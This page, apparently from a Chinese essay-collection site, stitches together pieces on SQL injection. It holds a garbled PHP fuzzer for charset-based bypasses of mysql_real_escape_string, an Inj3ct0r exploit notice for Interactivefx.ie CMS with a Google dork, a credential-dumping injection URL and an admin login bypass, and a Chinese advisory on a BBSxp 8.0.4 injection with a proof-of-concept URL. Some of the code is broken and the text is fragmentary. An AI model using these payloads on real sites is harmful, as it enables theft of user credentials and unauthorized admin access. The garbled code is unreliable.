mysql_select_db(”fuzz“, $c);

if ($switch == 1) {

// create demo table

mysql_query(”CREATE TABLE “.$row[0].”_users (

username VARCHAR(32) PRIMARY KEY,

password VARCHAR(32)

) CHARACTER SET '“.$row[0].”'“, $c);

//populate table

mysql_query(”INSERT INTO “.$row[0].”_users VALUES('foo','bar'), ('baz','test')“, $c);

} else {

mysql_query(”SET CHARACTER SET “.$row[0], $c);

for ($i=1;$i<256;$i++) {

//Well, I could have used a set of variables as switched, but I'm lazy, so we get comment blocks instead, :p

//Part 1

//Single Quotes

$user = mysql_real_escape_string(chr($i) . chr(0x27) . ' OR 1=1 /* ', $c);

//Double Quotes

//$user = mysql_real_escape_string(chr($i) . chr(0x22) . ' OR 1=1 /* ', $c);

$passwd = mysql_real_escape_string('anything', $c);

//Part 2

//$user = mysql_real_escape_string(' '.chr($i), $c);

//$user = addslashes(' '.chr($i));

//$passwd = mysql_real_escape_string(' OR 1=1 /*', $c);

//Part 3

//$user = mysql_real_escape_string(chr($i).' ', $c);

//$passwd = mysql_real_escape_string('test', $c);

//Single Quotes

$sql = ”SELECT * FROM “.$row[0].”_users WHERE username = '{$user}' AND password = '{$passwd}'“;

//Double Quotes

//$sql = ”SELECT * FROM “.$row[0].”_users WHERE username = “{$user}” AND password = “{$passwd}”“;

//Test SQL

//$sql = ”SELECT * FROM “.$row[0].”_users WHERE 1=0“;

$res = mysql_query($sql, $c);

if (!$res) {

$data[$row[0]] = mysql_error;

} else {

$num = mysql_num_rows($res);

if ($num 0) {

$data[$row[0]][$i] = $num;

}

mysql_close ($c);

print ”Done!

n“;

}

if ($switch == 1) {

print ”

Done!

n“;

} else {

print ”

n“;

print_r($data);

print ”

“;

}

篇7：Interactivefx.ie CMS SQL Injection Vulnerability

================================================

Interactivefx.ie CMS SQL Injection Vulnerability

================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0 _ __ __ __ 1

1 / __ /__` / __ /__` 0

0 /_, ___ /_/_ ___ ,_/ / _ ___ 1

1 /_/ / _ ` / /_/__<_ /___ / /`__ 0

0 / / / / __/ _ _ / 1

1 _ _ __ ____/ ____ __ ____/ _ 0

0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1

1 ____/ >> Exploit database separated by exploit 0

0 /___/ type (local, remote, DoS, etc.) 1

1 0

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r

#[+] Site : Inj3ct0r.com

#[+] support e-mail : submit[at]inj3ct0r.com

#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Site product: Interactivefx.ie

Product : Interactivefx.ie CMS

Google dork: ”Copyright Interactivefx.ie“

Sql Inj3ct0r Exploit:

server/event-details.php?id=223+select+username,password+from+users/*

Bypass authentication in admin panel:

pass: anypassyouwish

篇8：BBSxp (Build: 8.0.4) Sql Injection Vulnerability

首发www.nspcn.org ，此处版权

============================================

漏洞发布:Tr4c3[at]126[dot]Com

影响版本 BBSxp 2008 (Build: 8.0.4)其他版本未看

漏洞文件:MoveThread.asp

MoveThread.asp行2-24

if CookieUserName =empty then error(”您还未登录论坛“) '保存cookie登陆即可

ThreadID=Request(”ThreadID“) ' Sql Injection Vulnerability

If Not IsNumeric(ThreadID) then

ThreadIDArray=Split(ThreadID,”,“) '判断数组,避免13行出错

if IsArray(ThreadIDArray) then

for i=0 to Ubound(ThreadIDArray)

if Execute (”Select ThreadID from [“&TablePrefix&”Threads] where ThreadID=“& ThreadIDArray(i)&”“).eof then error”

系统不存在该帖子的资料“

ThreadIDSql=int(ThreadIDArray(0))

else

error(”参数错误，

BBSxp 2008 (Build: 8.0.4) Sql Injection Vulnerability

，

“)

end if

Else

ThreadIDSql=int(ThreadID)

End If

ForumID=Execute(”Select ForumID From [“&TablePrefix&”Threads] where ThreadID=“&ThreadIDSql&”“)(0)

先执行了查询后判断了权限，导致普通用户即可进行sql注射。

构造Url：www.target.com/movethread.asp?ThreadID=1,1'

提交，返回出错信息

Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误在查询表达式 'ThreadID=1'' 中。

/BBSXP_Class.asp，行 5

SQL 版本比较好利用，access的nbsi貌似只能猜解出表和字段，字段值无法猜解，需要手工进行。

欢迎大家到群[BK瞬间群]指点.

《[翻译]SQL Injection Attack（共8篇）.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

文档为doc格式

其他范文图文推荐

[翻译]SQL Injection Attack相关文章